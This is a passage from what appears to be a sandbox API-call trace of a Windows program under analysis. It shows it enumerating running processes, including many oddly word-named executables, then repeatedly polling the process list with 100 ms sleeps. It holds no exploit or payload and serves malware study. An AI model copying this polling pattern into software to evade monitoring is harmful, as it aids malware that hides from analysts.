pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0097.708] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0097.718] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.720] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0097.722] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.723] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0097.725] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.726] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0097.728] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0097.729] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.730] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0097.731] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0097.733] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0097.735] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0097.736] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0097.738] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0097.739] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0097.740] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0097.742] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0097.743] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0097.745] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0097.747] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0097.749] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0097.750] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0097.752] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0097.754] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0097.755] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0097.812] Sleep (dwMilliseconds=0x64) [0097.930] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1614 [0097.941] Process32First (in: hSnapshot=0x1614, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.087] Sleep (dwMilliseconds=0x64) [0098.243] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x96c [0098.255] Process32First (in: hSnapshot=0x96c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.451] Sleep (dwMilliseconds=0x64) [0098.650] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1628 [0098.662] Process32First (in: hSnapshot=0x1628, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0098.830] Sleep (dwMilliseconds=0x64) [0098.961] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd50 [0098.972] Process32First (in: hSnapshot=0xd50, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.061] Sleep (dwMilliseconds=0x64) [0099.171] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1628 [0099.186] Process32First (in: hSnapshot=0x1628, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.253] Sleep (dwMilliseconds=0x64) [0099.385] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd50 [0099.395] Process32First (in: hSnapshot=0xd50, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.831] Sleep (dwMilliseconds=0x64) [0099.993] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fb8 [0100.006] Process32First (in: hSnapshot=0x1fb8, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.144] Sleep (dwMilliseconds=0x64) [0100.342] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f98 [0100.358] Process32First (in: hSnapshot=0x1f98, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.464] Sleep (dwMilliseconds=0x64) [0100.580] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fa8 [0100.590] Process32First (in: hSnapshot=0x1fa8, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0100.762] Sleep (dwMilliseconds=0x64) [0100.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fc4 [0100.916] Process32First (in: hSnapshot=0x1fc4, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.076] Sleep (dwMilliseconds=0x64) [0101.221] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1048 [0101.231] Process32First (in: hSnapshot=0x1048, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.294] Sleep (dwMilliseconds=0x64) [0101.427] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fe0 [0101.456] Process32First (in: hSnapshot=0x1fe0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.699] Sleep (dwMilliseconds=0x64) [0101.813] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ff8 [0101.826] Process32First (in: hSnapshot=0x1ff8, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.984] Sleep (dwMilliseconds=0x64) [0102.086] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1ff8 [0102.101] Process32First (in: hSnapshot=0x1ff8, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.233] Sleep (dwMilliseconds=0x64) [0102.647] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x201c [0102.662] Process32First (in: hSnapshot=0x201c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0102.793] Sleep (dwMilliseconds=0x64) [0102.900] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fe8 [0102.911] Process32First (in: hSnapshot=0x1fe8, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.152] Sleep (dwMilliseconds=0x64) [0103.292] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a8 [0103.304] Process32First (in: hSnapshot=0x3a8, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.376] Sleep (dwMilliseconds=0x64) [0103.616] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f94 [0103.628] Process32First (in: hSnapshot=0x1f94, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0103.705] Sleep (dwMilliseconds=0x64) [0103.832] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x950 [0103.845] Process32First (in: hSnapshot=0x950, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.047] Sleep (dwMilliseconds=0x64) [0104.320] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x204c [0104.431] Process32First (in: hSnapshot=0x204c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.506] Sleep (dwMilliseconds=0x64) [0104.860] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2084 [0104.870] Process32First (in: hSnapshot=0x2084, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0104.929] Sleep (dwMilliseconds=0x64) [0105.055] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2080 [0105.064] Process32First (in: hSnapshot=0x2080, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.214] Sleep (dwMilliseconds=0x64) [0105.368] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20a4 [0105.383] Process32First (in: hSnapshot=0x20a4, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0105.786] Sleep (dwMilliseconds=0x64) [0105.941] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1fe8 [0105.961] Process32First (in: hSnapshot=0x1fe8, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.297] Sleep (dwMilliseconds=0x64) [0106.651] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20b8 [0106.664] Process32First (in: hSnapshot=0x20b8, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.978] Sleep (dwMilliseconds=0x64) [0107.092] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20e0 [0107.103] Process32First (in: hSnapshot=0x20e0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.199] Sleep (dwMilliseconds=0x64) [0107.489] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x210c [0107.499] Process32First (in: hSnapshot=0x210c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.577] Sleep (dwMilliseconds=0x64) [0107.695] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2110 [0107.719] Process32First (in: hSnapshot=0x2110, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.918] Sleep (dwMilliseconds=0x64) [0108.023] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2128 [0108.033] Process32First (in: hSnapshot=0x2128, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.204] Sleep (dwMilliseconds=0x64) [0108.318] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20a4 [0108.327] Process32First (in: hSnapshot=0x20a4, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.431] Sleep (dwMilliseconds=0x64) [0108.537] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2138 [0108.550] Process32First (in: hSnapshot=0x2138, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.670] Sleep (dwMilliseconds=0x64) [0108.850] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x213c [0108.860] Process32First (in: hSnapshot=0x213c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.965] Sleep (dwMilliseconds=0x64) [0109.067] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x213c [0109.077] Process32First (in: hSnapshot=0x213c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.147] Sleep (dwMilliseconds=0x64) [0109.261] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2144 [0109.271] Process32First (in: hSnapshot=0x2144, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.329] Sleep (dwMilliseconds=0x64) [0109.601] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x20a4 [0109.611] Process32First (in: hSnapshot=0x20a4, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.698] Sleep (dwMilliseconds=0x64) [0109.802] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x215c [0109.814] Process32First (in: hSnapshot=0x215c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.940] Sleep (dwMilliseconds=0x64) [0110.084] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15c0 [0110.097] Process32First (in: hSnapshot=0x15c0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.207] Sleep (dwMilliseconds=0x64) [0110.444] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2184 [0110.459] Process32First (in: hSnapshot=0x2184, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.559] Sleep (dwMilliseconds=0x64) [0110.736] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x219c [0110.748] Process32First (in: hSnapshot=0x219c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.837] Sleep (dwMilliseconds=0x64) [0110.986] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2198 [0110.996] Process32First (in: hSnapshot=0x2198, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.092] Sleep (dwMilliseconds=0x64) [0111.218] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1758 [0111.227] Process32First (in: hSnapshot=0x1758, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, 